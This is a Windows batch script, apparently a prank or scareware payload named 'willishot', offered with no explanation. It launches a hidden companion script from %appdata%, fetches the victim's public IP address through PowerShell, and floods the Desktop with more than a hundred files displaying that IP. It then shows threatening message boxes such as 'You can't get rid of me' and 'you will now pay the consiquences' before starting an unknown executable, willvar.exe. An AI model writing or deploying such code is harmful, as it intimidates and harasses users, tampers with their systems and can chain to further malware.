@echo off
start /min %appdata%\willishot\notif.bat
cd C:\Users\%USERNAME%\Desktop\
for /f %%a in ('powershell Invoke-RestMethod api.ipify.org') do set PublicIP=%%a
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json" 
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
echo nice ip %PublicIP% > "nice ip - %random%.json"
cscript %appdata%\willishot\MessageBox.vbs "Nice computer" >nul
ping localhost -n 2 >nul
cscript %appdata%\willishot\MessageBox.vbs "Do you really think it's that easy?" >nul
ping localhost -n 2 >nul
cscript %appdata%\willishot\MessageBox.vbs "You can't get rid of me lmao" >nul
ping localhost -n 2 >nul
cscript %appdata%\willishot\MessageBox.vbs "you should have said will is hot" >nul
ping localhost -n 2 >nul
cscript %appdata%\willishot\MessageBox.vbs "you will now pay the consiquences" >nul
timeout 2 >nul
start %appdata%\willishot\willvar.exe